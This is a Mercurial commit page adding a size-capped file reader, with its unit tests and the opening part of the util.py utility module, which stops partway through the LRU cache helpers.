##// END OF EJS Templates
util: add a file object proxy that can read at most N bytes...
Gregory Szorc -
r36382:01e29e88 default
parent child Browse files
Show More
@@ -0,0 +1,91 b''
1 from __future__ import absolute_import, print_function
2
3 import io
4 import unittest
5
6 from mercurial import (
7 util,
8 )
9
10 class CappedReaderTests(unittest.TestCase):
11 def testreadfull(self):
12 source = io.BytesIO(b'x' * 100)
13
14 reader = util.cappedreader(source, 10)
15 res = reader.read(10)
16 self.assertEqual(res, b'x' * 10)
17 self.assertEqual(source.tell(), 10)
18 source.seek(0)
19
20 reader = util.cappedreader(source, 15)
21 res = reader.read(16)
22 self.assertEqual(res, b'x' * 15)
23 self.assertEqual(source.tell(), 15)
24 source.seek(0)
25
26 reader = util.cappedreader(source, 100)
27 res = reader.read(100)
28 self.assertEqual(res, b'x' * 100)
29 self.assertEqual(source.tell(), 100)
30 source.seek(0)
31
32 reader = util.cappedreader(source, 50)
33 res = reader.read()
34 self.assertEqual(res, b'x' * 50)
35 self.assertEqual(source.tell(), 50)
36 source.seek(0)
37
38 def testreadnegative(self):
39 source = io.BytesIO(b'x' * 100)
40
41 reader = util.cappedreader(source, 20)
42 res = reader.read(-1)
43 self.assertEqual(res, b'x' * 20)
44 self.assertEqual(source.tell(), 20)
45 source.seek(0)
46
47 reader = util.cappedreader(source, 100)
48 res = reader.read(-1)
49 self.assertEqual(res, b'x' * 100)
50 self.assertEqual(source.tell(), 100)
51 source.seek(0)
52
53 def testreadmultiple(self):
54 source = io.BytesIO(b'x' * 100)
55
56 reader = util.cappedreader(source, 10)
57 for i in range(10):
58 res = reader.read(1)
59 self.assertEqual(res, b'x')
60 self.assertEqual(source.tell(), i + 1)
61
62 self.assertEqual(source.tell(), 10)
63 res = reader.read(1)
64 self.assertEqual(res, b'')
65 self.assertEqual(source.tell(), 10)
66 source.seek(0)
67
68 reader = util.cappedreader(source, 45)
69 for i in range(4):
70 res = reader.read(10)
71 self.assertEqual(res, b'x' * 10)
72 self.assertEqual(source.tell(), (i + 1) * 10)
73
74 res = reader.read(10)
75 self.assertEqual(res, b'x' * 5)
76 self.assertEqual(source.tell(), 45)
77
78 def readlimitpasteof(self):
79 source = io.BytesIO(b'x' * 100)
80
81 reader = util.cappedreader(source, 1024)
82 res = reader.read(1000)
83 self.assertEqual(res, b'x' * 100)
84 self.assertEqual(source.tell(), 100)
85 res = reader.read(1000)
86 self.assertEqual(res, b'')
87 self.assertEqual(source.tell(), 100)
88
89 if __name__ == '__main__':
90 import silenttestrunner
91 silenttestrunner.main(__name__)
@@ -1,3979 +1,4008 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import itertools
30 30 import mmap
31 31 import os
32 32 import platform as pyplatform
33 33 import re as remod
34 34 import shutil
35 35 import signal
36 36 import socket
37 37 import stat
38 38 import string
39 39 import subprocess
40 40 import sys
41 41 import tempfile
42 42 import textwrap
43 43 import time
44 44 import traceback
45 45 import warnings
46 46 import zlib
47 47
48 48 from . import (
49 49 encoding,
50 50 error,
51 51 i18n,
52 52 node as nodemod,
53 53 policy,
54 54 pycompat,
55 55 urllibcompat,
56 56 )
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 stringio = pycompat.stringio
75 75 xmlrpclib = pycompat.xmlrpclib
76 76
77 77 httpserver = urllibcompat.httpserver
78 78 urlerr = urllibcompat.urlerr
79 79 urlreq = urllibcompat.urlreq
80 80
81 81 # workaround for win32mbcs
82 82 _filenamebytestr = pycompat.bytestr
83 83
84 84 def isatty(fp):
85 85 try:
86 86 return fp.isatty()
87 87 except AttributeError:
88 88 return False
89 89
90 90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 92 # buffering
93 93 if isatty(stdout):
94 94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95 95
96 96 if pycompat.iswindows:
97 97 from . import windows as platform
98 98 stdout = platform.winstdout(stdout)
99 99 else:
100 100 from . import posix as platform
101 101
102 102 _ = i18n._
103 103
104 104 bindunixsocket = platform.bindunixsocket
105 105 cachestat = platform.cachestat
106 106 checkexec = platform.checkexec
107 107 checklink = platform.checklink
108 108 copymode = platform.copymode
109 109 executablepath = platform.executablepath
110 110 expandglobs = platform.expandglobs
111 111 explainexit = platform.explainexit
112 112 findexe = platform.findexe
113 113 getfsmountpoint = platform.getfsmountpoint
114 114 getfstype = platform.getfstype
115 115 gethgcmd = platform.gethgcmd
116 116 getuser = platform.getuser
117 117 getpid = os.getpid
118 118 groupmembers = platform.groupmembers
119 119 groupname = platform.groupname
120 120 hidewindow = platform.hidewindow
121 121 isexec = platform.isexec
122 122 isowner = platform.isowner
123 123 listdir = osutil.listdir
124 124 localpath = platform.localpath
125 125 lookupreg = platform.lookupreg
126 126 makedir = platform.makedir
127 127 nlinks = platform.nlinks
128 128 normpath = platform.normpath
129 129 normcase = platform.normcase
130 130 normcasespec = platform.normcasespec
131 131 normcasefallback = platform.normcasefallback
132 132 openhardlinks = platform.openhardlinks
133 133 oslink = platform.oslink
134 134 parsepatchoutput = platform.parsepatchoutput
135 135 pconvert = platform.pconvert
136 136 poll = platform.poll
137 137 popen = platform.popen
138 138 posixfile = platform.posixfile
139 139 quotecommand = platform.quotecommand
140 140 readpipe = platform.readpipe
141 141 rename = platform.rename
142 142 removedirs = platform.removedirs
143 143 samedevice = platform.samedevice
144 144 samefile = platform.samefile
145 145 samestat = platform.samestat
146 146 setbinary = platform.setbinary
147 147 setflags = platform.setflags
148 148 setsignalhandler = platform.setsignalhandler
149 149 shellquote = platform.shellquote
150 150 spawndetached = platform.spawndetached
151 151 split = platform.split
152 152 sshargs = platform.sshargs
153 153 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
154 154 statisexec = platform.statisexec
155 155 statislink = platform.statislink
156 156 testpid = platform.testpid
157 157 umask = platform.umask
158 158 unlink = platform.unlink
159 159 username = platform.username
160 160
161 161 try:
162 162 recvfds = osutil.recvfds
163 163 except AttributeError:
164 164 pass
165 165 try:
166 166 setprocname = osutil.setprocname
167 167 except AttributeError:
168 168 pass
169 169 try:
170 170 unblocksignal = osutil.unblocksignal
171 171 except AttributeError:
172 172 pass
173 173
174 174 # Python compatibility
175 175
176 176 _notset = object()
177 177
178 178 # disable Python's problematic floating point timestamps (issue4836)
179 179 # (Python hypocritically says you shouldn't change this behavior in
180 180 # libraries, and sure enough Mercurial is not a library.)
181 181 os.stat_float_times(False)
182 182
183 183 def safehasattr(thing, attr):
184 184 return getattr(thing, attr, _notset) is not _notset
185 185
186 186 def _rapply(f, xs):
187 187 if xs is None:
188 188 # assume None means non-value of optional data
189 189 return xs
190 190 if isinstance(xs, (list, set, tuple)):
191 191 return type(xs)(_rapply(f, x) for x in xs)
192 192 if isinstance(xs, dict):
193 193 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
194 194 return f(xs)
195 195
196 196 def rapply(f, xs):
197 197 """Apply function recursively to every item preserving the data structure
198 198
199 199 >>> def f(x):
200 200 ... return 'f(%s)' % x
201 201 >>> rapply(f, None) is None
202 202 True
203 203 >>> rapply(f, 'a')
204 204 'f(a)'
205 205 >>> rapply(f, {'a'}) == {'f(a)'}
206 206 True
207 207 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
208 208 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
209 209
210 210 >>> xs = [object()]
211 211 >>> rapply(pycompat.identity, xs) is xs
212 212 True
213 213 """
214 214 if f is pycompat.identity:
215 215 # fast path mainly for py2
216 216 return xs
217 217 return _rapply(f, xs)
218 218
219 219 def bytesinput(fin, fout, *args, **kwargs):
220 220 sin, sout = sys.stdin, sys.stdout
221 221 try:
222 222 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
223 223 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
224 224 finally:
225 225 sys.stdin, sys.stdout = sin, sout
226 226
227 227 def bitsfrom(container):
228 228 bits = 0
229 229 for bit in container:
230 230 bits |= bit
231 231 return bits
232 232
233 233 # python 2.6 still have deprecation warning enabled by default. We do not want
234 234 # to display anything to standard user so detect if we are running test and
235 235 # only use python deprecation warning in this case.
236 236 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
237 237 if _dowarn:
238 238 # explicitly unfilter our warning for python 2.7
239 239 #
240 240 # The option of setting PYTHONWARNINGS in the test runner was investigated.
241 241 # However, module name set through PYTHONWARNINGS was exactly matched, so
242 242 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
243 243 # makes the whole PYTHONWARNINGS thing useless for our usecase.
244 244 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
245 245 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
246 246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
247 247
248 248 def nouideprecwarn(msg, version, stacklevel=1):
249 249 """Issue an python native deprecation warning
250 250
251 251 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
252 252 """
253 253 if _dowarn:
254 254 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
255 255 " update your code.)") % version
256 256 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
257 257
258 258 DIGESTS = {
259 259 'md5': hashlib.md5,
260 260 'sha1': hashlib.sha1,
261 261 'sha512': hashlib.sha512,
262 262 }
263 263 # List of digest types from strongest to weakest
264 264 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
265 265
266 266 for k in DIGESTS_BY_STRENGTH:
267 267 assert k in DIGESTS
268 268
269 269 class digester(object):
270 270 """helper to compute digests.
271 271
272 272 This helper can be used to compute one or more digests given their name.
273 273
274 274 >>> d = digester([b'md5', b'sha1'])
275 275 >>> d.update(b'foo')
276 276 >>> [k for k in sorted(d)]
277 277 ['md5', 'sha1']
278 278 >>> d[b'md5']
279 279 'acbd18db4cc2f85cedef654fccc4a4d8'
280 280 >>> d[b'sha1']
281 281 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
282 282 >>> digester.preferred([b'md5', b'sha1'])
283 283 'sha1'
284 284 """
285 285
286 286 def __init__(self, digests, s=''):
287 287 self._hashes = {}
288 288 for k in digests:
289 289 if k not in DIGESTS:
290 290 raise Abort(_('unknown digest type: %s') % k)
291 291 self._hashes[k] = DIGESTS[k]()
292 292 if s:
293 293 self.update(s)
294 294
295 295 def update(self, data):
296 296 for h in self._hashes.values():
297 297 h.update(data)
298 298
299 299 def __getitem__(self, key):
300 300 if key not in DIGESTS:
301 301 raise Abort(_('unknown digest type: %s') % k)
302 302 return nodemod.hex(self._hashes[key].digest())
303 303
304 304 def __iter__(self):
305 305 return iter(self._hashes)
306 306
307 307 @staticmethod
308 308 def preferred(supported):
309 309 """returns the strongest digest type in both supported and DIGESTS."""
310 310
311 311 for k in DIGESTS_BY_STRENGTH:
312 312 if k in supported:
313 313 return k
314 314 return None
315 315
316 316 class digestchecker(object):
317 317 """file handle wrapper that additionally checks content against a given
318 318 size and digests.
319 319
320 320 d = digestchecker(fh, size, {'md5': '...'})
321 321
322 322 When multiple digests are given, all of them are validated.
323 323 """
324 324
325 325 def __init__(self, fh, size, digests):
326 326 self._fh = fh
327 327 self._size = size
328 328 self._got = 0
329 329 self._digests = dict(digests)
330 330 self._digester = digester(self._digests.keys())
331 331
332 332 def read(self, length=-1):
333 333 content = self._fh.read(length)
334 334 self._digester.update(content)
335 335 self._got += len(content)
336 336 return content
337 337
338 338 def validate(self):
339 339 if self._size != self._got:
340 340 raise Abort(_('size mismatch: expected %d, got %d') %
341 341 (self._size, self._got))
342 342 for k, v in self._digests.items():
343 343 if v != self._digester[k]:
344 344 # i18n: first parameter is a digest name
345 345 raise Abort(_('%s mismatch: expected %s, got %s') %
346 346 (k, v, self._digester[k]))
347 347
348 348 try:
349 349 buffer = buffer
350 350 except NameError:
351 351 def buffer(sliceable, offset=0, length=None):
352 352 if length is not None:
353 353 return memoryview(sliceable)[offset:offset + length]
354 354 return memoryview(sliceable)[offset:]
355 355
356 356 closefds = pycompat.isposix
357 357
358 358 _chunksize = 4096
359 359
360 360 class bufferedinputpipe(object):
361 361 """a manually buffered input pipe
362 362
363 363 Python will not let us use buffered IO and lazy reading with 'polling' at
364 364 the same time. We cannot probe the buffer state and select will not detect
365 365 that data are ready to read if they are already buffered.
366 366
367 367 This class let us work around that by implementing its own buffering
368 368 (allowing efficient readline) while offering a way to know if the buffer is
369 369 empty from the output (allowing collaboration of the buffer with polling).
370 370
371 371 This class lives in the 'util' module because it makes use of the 'os'
372 372 module from the python stdlib.
373 373 """
374 374
375 375 def __init__(self, input):
376 376 self._input = input
377 377 self._buffer = []
378 378 self._eof = False
379 379 self._lenbuf = 0
380 380
381 381 @property
382 382 def hasbuffer(self):
383 383 """True is any data is currently buffered
384 384
385 385 This will be used externally a pre-step for polling IO. If there is
386 386 already data then no polling should be set in place."""
387 387 return bool(self._buffer)
388 388
389 389 @property
390 390 def closed(self):
391 391 return self._input.closed
392 392
393 393 def fileno(self):
394 394 return self._input.fileno()
395 395
396 396 def close(self):
397 397 return self._input.close()
398 398
399 399 def read(self, size):
400 400 while (not self._eof) and (self._lenbuf < size):
401 401 self._fillbuffer()
402 402 return self._frombuffer(size)
403 403
404 404 def readline(self, *args, **kwargs):
405 405 if 1 < len(self._buffer):
406 406 # this should not happen because both read and readline end with a
407 407 # _frombuffer call that collapse it.
408 408 self._buffer = [''.join(self._buffer)]
409 409 self._lenbuf = len(self._buffer[0])
410 410 lfi = -1
411 411 if self._buffer:
412 412 lfi = self._buffer[-1].find('\n')
413 413 while (not self._eof) and lfi < 0:
414 414 self._fillbuffer()
415 415 if self._buffer:
416 416 lfi = self._buffer[-1].find('\n')
417 417 size = lfi + 1
418 418 if lfi < 0: # end of file
419 419 size = self._lenbuf
420 420 elif 1 < len(self._buffer):
421 421 # we need to take previous chunks into account
422 422 size += self._lenbuf - len(self._buffer[-1])
423 423 return self._frombuffer(size)
424 424
425 425 def _frombuffer(self, size):
426 426 """return at most 'size' data from the buffer
427 427
428 428 The data are removed from the buffer."""
429 429 if size == 0 or not self._buffer:
430 430 return ''
431 431 buf = self._buffer[0]
432 432 if 1 < len(self._buffer):
433 433 buf = ''.join(self._buffer)
434 434
435 435 data = buf[:size]
436 436 buf = buf[len(data):]
437 437 if buf:
438 438 self._buffer = [buf]
439 439 self._lenbuf = len(buf)
440 440 else:
441 441 self._buffer = []
442 442 self._lenbuf = 0
443 443 return data
444 444
445 445 def _fillbuffer(self):
446 446 """read data to the buffer"""
447 447 data = os.read(self._input.fileno(), _chunksize)
448 448 if not data:
449 449 self._eof = True
450 450 else:
451 451 self._lenbuf += len(data)
452 452 self._buffer.append(data)
453 453
454 454 def mmapread(fp):
455 455 try:
456 456 fd = getattr(fp, 'fileno', lambda: fp)()
457 457 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
458 458 except ValueError:
459 459 # Empty files cannot be mmapped, but mmapread should still work. Check
460 460 # if the file is empty, and if so, return an empty buffer.
461 461 if os.fstat(fd).st_size == 0:
462 462 return ''
463 463 raise
464 464
465 465 def popen2(cmd, env=None, newlines=False):
466 466 # Setting bufsize to -1 lets the system decide the buffer size.
467 467 # The default for bufsize is 0, meaning unbuffered. This leads to
468 468 # poor performance on Mac OS X: http://bugs.python.org/issue4194
469 469 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
470 470 close_fds=closefds,
471 471 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
472 472 universal_newlines=newlines,
473 473 env=env)
474 474 return p.stdin, p.stdout
475 475
476 476 def popen3(cmd, env=None, newlines=False):
477 477 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
478 478 return stdin, stdout, stderr
479 479
480 480 def popen4(cmd, env=None, newlines=False, bufsize=-1):
481 481 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
482 482 close_fds=closefds,
483 483 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
484 484 stderr=subprocess.PIPE,
485 485 universal_newlines=newlines,
486 486 env=env)
487 487 return p.stdin, p.stdout, p.stderr, p
488 488
489 489 def version():
490 490 """Return version information if available."""
491 491 try:
492 492 from . import __version__
493 493 return __version__.version
494 494 except ImportError:
495 495 return 'unknown'
496 496
497 497 def versiontuple(v=None, n=4):
498 498 """Parses a Mercurial version string into an N-tuple.
499 499
500 500 The version string to be parsed is specified with the ``v`` argument.
501 501 If it isn't defined, the current Mercurial version string will be parsed.
502 502
503 503 ``n`` can be 2, 3, or 4. Here is how some version strings map to
504 504 returned values:
505 505
506 506 >>> v = b'3.6.1+190-df9b73d2d444'
507 507 >>> versiontuple(v, 2)
508 508 (3, 6)
509 509 >>> versiontuple(v, 3)
510 510 (3, 6, 1)
511 511 >>> versiontuple(v, 4)
512 512 (3, 6, 1, '190-df9b73d2d444')
513 513
514 514 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
515 515 (3, 6, 1, '190-df9b73d2d444+20151118')
516 516
517 517 >>> v = b'3.6'
518 518 >>> versiontuple(v, 2)
519 519 (3, 6)
520 520 >>> versiontuple(v, 3)
521 521 (3, 6, None)
522 522 >>> versiontuple(v, 4)
523 523 (3, 6, None, None)
524 524
525 525 >>> v = b'3.9-rc'
526 526 >>> versiontuple(v, 2)
527 527 (3, 9)
528 528 >>> versiontuple(v, 3)
529 529 (3, 9, None)
530 530 >>> versiontuple(v, 4)
531 531 (3, 9, None, 'rc')
532 532
533 533 >>> v = b'3.9-rc+2-02a8fea4289b'
534 534 >>> versiontuple(v, 2)
535 535 (3, 9)
536 536 >>> versiontuple(v, 3)
537 537 (3, 9, None)
538 538 >>> versiontuple(v, 4)
539 539 (3, 9, None, 'rc+2-02a8fea4289b')
540 540 """
541 541 if not v:
542 542 v = version()
543 543 parts = remod.split('[\+-]', v, 1)
544 544 if len(parts) == 1:
545 545 vparts, extra = parts[0], None
546 546 else:
547 547 vparts, extra = parts
548 548
549 549 vints = []
550 550 for i in vparts.split('.'):
551 551 try:
552 552 vints.append(int(i))
553 553 except ValueError:
554 554 break
555 555 # (3, 6) -> (3, 6, None)
556 556 while len(vints) < 3:
557 557 vints.append(None)
558 558
559 559 if n == 2:
560 560 return (vints[0], vints[1])
561 561 if n == 3:
562 562 return (vints[0], vints[1], vints[2])
563 563 if n == 4:
564 564 return (vints[0], vints[1], vints[2], extra)
565 565
566 566 # used by parsedate
567 567 defaultdateformats = (
568 568 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
569 569 '%Y-%m-%dT%H:%M', # without seconds
570 570 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
571 571 '%Y-%m-%dT%H%M', # without seconds
572 572 '%Y-%m-%d %H:%M:%S', # our common legal variant
573 573 '%Y-%m-%d %H:%M', # without seconds
574 574 '%Y-%m-%d %H%M%S', # without :
575 575 '%Y-%m-%d %H%M', # without seconds
576 576 '%Y-%m-%d %I:%M:%S%p',
577 577 '%Y-%m-%d %H:%M',
578 578 '%Y-%m-%d %I:%M%p',
579 579 '%Y-%m-%d',
580 580 '%m-%d',
581 581 '%m/%d',
582 582 '%m/%d/%y',
583 583 '%m/%d/%Y',
584 584 '%a %b %d %H:%M:%S %Y',
585 585 '%a %b %d %I:%M:%S%p %Y',
586 586 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
587 587 '%b %d %H:%M:%S %Y',
588 588 '%b %d %I:%M:%S%p %Y',
589 589 '%b %d %H:%M:%S',
590 590 '%b %d %I:%M:%S%p',
591 591 '%b %d %H:%M',
592 592 '%b %d %I:%M%p',
593 593 '%b %d %Y',
594 594 '%b %d',
595 595 '%H:%M:%S',
596 596 '%I:%M:%S%p',
597 597 '%H:%M',
598 598 '%I:%M%p',
599 599 )
600 600
601 601 extendeddateformats = defaultdateformats + (
602 602 "%Y",
603 603 "%Y-%m",
604 604 "%b",
605 605 "%b %Y",
606 606 )
607 607
608 608 def cachefunc(func):
609 609 '''cache the result of function calls'''
610 610 # XXX doesn't handle keywords args
611 611 if func.__code__.co_argcount == 0:
612 612 cache = []
613 613 def f():
614 614 if len(cache) == 0:
615 615 cache.append(func())
616 616 return cache[0]
617 617 return f
618 618 cache = {}
619 619 if func.__code__.co_argcount == 1:
620 620 # we gain a small amount of time because
621 621 # we don't need to pack/unpack the list
622 622 def f(arg):
623 623 if arg not in cache:
624 624 cache[arg] = func(arg)
625 625 return cache[arg]
626 626 else:
627 627 def f(*args):
628 628 if args not in cache:
629 629 cache[args] = func(*args)
630 630 return cache[args]
631 631
632 632 return f
633 633
634 634 class cow(object):
635 635 """helper class to make copy-on-write easier
636 636
637 637 Call preparewrite before doing any writes.
638 638 """
639 639
640 640 def preparewrite(self):
641 641 """call this before writes, return self or a copied new object"""
642 642 if getattr(self, '_copied', 0):
643 643 self._copied -= 1
644 644 return self.__class__(self)
645 645 return self
646 646
647 647 def copy(self):
648 648 """always do a cheap copy"""
649 649 self._copied = getattr(self, '_copied', 0) + 1
650 650 return self
651 651
652 652 class sortdict(collections.OrderedDict):
653 653 '''a simple sorted dictionary
654 654
655 655 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
656 656 >>> d2 = d1.copy()
657 657 >>> d2
658 658 sortdict([('a', 0), ('b', 1)])
659 659 >>> d2.update([(b'a', 2)])
660 660 >>> list(d2.keys()) # should still be in last-set order
661 661 ['b', 'a']
662 662 '''
663 663
664 664 def __setitem__(self, key, value):
665 665 if key in self:
666 666 del self[key]
667 667 super(sortdict, self).__setitem__(key, value)
668 668
669 669 if pycompat.ispypy:
670 670 # __setitem__() isn't called as of PyPy 5.8.0
671 671 def update(self, src):
672 672 if isinstance(src, dict):
673 673 src = src.iteritems()
674 674 for k, v in src:
675 675 self[k] = v
676 676
677 677 class cowdict(cow, dict):
678 678 """copy-on-write dict
679 679
680 680 Be sure to call d = d.preparewrite() before writing to d.
681 681
682 682 >>> a = cowdict()
683 683 >>> a is a.preparewrite()
684 684 True
685 685 >>> b = a.copy()
686 686 >>> b is a
687 687 True
688 688 >>> c = b.copy()
689 689 >>> c is a
690 690 True
691 691 >>> a = a.preparewrite()
692 692 >>> b is a
693 693 False
694 694 >>> a is a.preparewrite()
695 695 True
696 696 >>> c = c.preparewrite()
697 697 >>> b is c
698 698 False
699 699 >>> b is b.preparewrite()
700 700 True
701 701 """
702 702
703 703 class cowsortdict(cow, sortdict):
704 704 """copy-on-write sortdict
705 705
706 706 Be sure to call d = d.preparewrite() before writing to d.
707 707 """
708 708
709 709 class transactional(object):
710 710 """Base class for making a transactional type into a context manager."""
711 711 __metaclass__ = abc.ABCMeta
712 712
713 713 @abc.abstractmethod
714 714 def close(self):
715 715 """Successfully closes the transaction."""
716 716
717 717 @abc.abstractmethod
718 718 def release(self):
719 719 """Marks the end of the transaction.
720 720
721 721 If the transaction has not been closed, it will be aborted.
722 722 """
723 723
724 724 def __enter__(self):
725 725 return self
726 726
727 727 def __exit__(self, exc_type, exc_val, exc_tb):
728 728 try:
729 729 if exc_type is None:
730 730 self.close()
731 731 finally:
732 732 self.release()
733 733
734 734 @contextlib.contextmanager
735 735 def acceptintervention(tr=None):
736 736 """A context manager that closes the transaction on InterventionRequired
737 737
738 738 If no transaction was provided, this simply runs the body and returns
739 739 """
740 740 if not tr:
741 741 yield
742 742 return
743 743 try:
744 744 yield
745 745 tr.close()
746 746 except error.InterventionRequired:
747 747 tr.close()
748 748 raise
749 749 finally:
750 750 tr.release()
751 751
752 752 @contextlib.contextmanager
753 753 def nullcontextmanager():
754 754 yield
755 755
756 756 class _lrucachenode(object):
757 757 """A node in a doubly linked list.
758 758
759 759 Holds a reference to nodes on either side as well as a key-value
760 760 pair for the dictionary entry.
761 761 """
762 762 __slots__ = (u'next', u'prev', u'key', u'value')
763 763
764 764 def __init__(self):
765 765 self.next = None
766 766 self.prev = None
767 767
768 768 self.key = _notset
769 769 self.value = None
770 770
771 771 def markempty(self):
772 772 """Mark the node as emptied."""
773 773 self.key = _notset
774 774
775 775 class lrucachedict(object):
776 776 """Dict that caches most recent accesses and sets.
777 777
778 778 The dict consists of an actual backing dict - indexed by original
779 779 key - and a doubly linked circular list defining the order of entries in
780 780 the cache.
781 781
782 782 The head node is the newest entry in the cache. If the cache is full,
783 783 we recycle head.prev and make it the new head. Cache accesses result in
784 784 the node being moved to before the existing head and being marked as the
785 785 new head node.
786 786 """
787 787 def __init__(self, max):
788 788 self._cache = {}
789 789
790 790 self._head = head = _lrucachenode()
791 791 head.prev = head
792 792 head.next = head
793 793 self._size = 1
794 794 self._capacity = max
795 795
796 796 def __len__(self):
797 797 return len(self._cache)
798 798
799 799 def __contains__(self, k):
800 800 return k in self._cache
801 801
802 802 def __iter__(self):
803 803 # We don't have to iterate in cache order, but why not.
804 804 n = self._head
805 805 for i in range(len(self._cache)):
806 806 yield n.key
807 807 n = n.next
808 808
809 809 def __getitem__(self, k):
810 810 node = self._cache[k]
811 811 self._movetohead(node)
812 812 return node.value
813 813
814 814 def __setitem__(self, k, v):
815 815 node = self._cache.get(k)
816 816 # Replace existing value and mark as newest.
817 817 if node is not None:
818 818 node.value = v
819 819 self._movetohead(node)
820 820 return
821 821
822 822 if self._size < self._capacity:
823 823 node = self._addcapacity()
824 824 else:
825 825 # Grab the last/oldest item.
826 826 node = self._head.prev
827 827
828 828 # At capacity. Kill the old entry.
829 829 if node.key is not _notset:
830 830 del self._cache[node.key]
831 831
832 832 node.key = k
833 833 node.value = v
834 834 self._cache[k] = node
835 835 # And mark it as newest entry. No need to adjust order since it
836 836 # is already self._head.prev.
837 837 self._head = node
838 838
839 839 def __delitem__(self, k):
840 840 node = self._cache.pop(k)
841 841 node.markempty()
842 842
843 843 # Temporarily mark as newest item before re-adjusting head to make
844 844 # this node the oldest item.
845 845 self._movetohead(node)
846 846 self._head = node.next
847 847
848 848 # Additional dict methods.
849 849
850 850 def get(self, k, default=None):
851 851 try:
852 852 return self._cache[k].value
853 853 except KeyError:
854 854 return default
855 855
856 856 def clear(self):
857 857 n = self._head
858 858 while n.key is not _notset:
859 859 n.markempty()
860 860 n = n.next
861 861
862 862 self._cache.clear()
863 863
864 864 def copy(self):
865 865 result = lrucachedict(self._capacity)
866 866 n = self._head.prev
867 867 # Iterate in oldest-to-newest order, so the copy has the right ordering
868 868 for i in range(len(self._cache)):
869 869 result[n.key] = n.value
870 870 n = n.prev
871 871 return result
872 872
873 873 def _movetohead(self, node):
874 874 """Mark a node as the newest, making it the new head.
875 875
876 876 When a node is accessed, it becomes the freshest entry in the LRU
877 877 list, which is denoted by self._head.
878 878
879 879 Visually, let's make ``N`` the new head node (* denotes head):
880 880
881 881 previous/oldest <-> head <-> next/next newest
882 882
883 883 ----<->--- A* ---<->-----
884 884 | |
885 885 E <-> D <-> N <-> C <-> B
886 886
887 887 To:
888 888
889 889 ----<->--- N* ---<->-----
890 890 | |
891 891 E <-> D <-> C <-> B <-> A
892 892
893 893 This requires the following moves:
894 894
895 895 C.next = D (node.prev.next = node.next)
896 896 D.prev = C (node.next.prev = node.prev)
897 897 E.next = N (head.prev.next = node)
898 898 N.prev = E (node.prev = head.prev)
899 899 N.next = A (node.next = head)
900 900 A.prev = N (head.prev = node)
901 901 """
902 902 head = self._head
903 903 # C.next = D
904 904 node.prev.next = node.next
905 905 # D.prev = C
906 906 node.next.prev = node.prev
907 907 # N.prev = E
908 908 node.prev = head.prev
909 909 # N.next = A
910 910 # It is tempting to do just "head" here, however if node is
911 911 # adjacent to head, this will do bad things.
912 912 node.next = head.prev.next
913 913 # E.next = N
914 914 node.next.prev = node
915 915 # A.prev = N
916 916 node.prev.next = node
917 917
918 918 self._head = node
919 919
920 920 def _addcapacity(self):
921 921 """Add a node to the circular linked list.
922 922
923 923 The new node is inserted before the head node.
924 924 """
925 925 head = self._head
926 926 node = _lrucachenode()
927 927 head.prev.next = node
928 928 node.prev = head.prev
929 929 node.next = head
930 930 head.prev = node
931 931 self._size += 1
932 932 return node
933 933
934 934 def lrucachefunc(func):
935 935 '''cache most recent results of function calls'''
936 936 cache = {}
937 937 order = collections.deque()
938 938 if func.__code__.co_argcount == 1:
939 939 def f(arg):
940 940 if arg not in cache:
941 941 if len(cache) > 20:
942 942 del cache[order.popleft()]
943 943 cache[arg] = func(arg)
944 944 else:
945 945 order.remove(arg)
946 946 order.append(arg)
947 947 return cache[arg]
948 948 else:
949 949 def f(*args):
950 950 if args not in cache:
951 951 if len(cache) > 20:
952 952 del cache[order.popleft()]
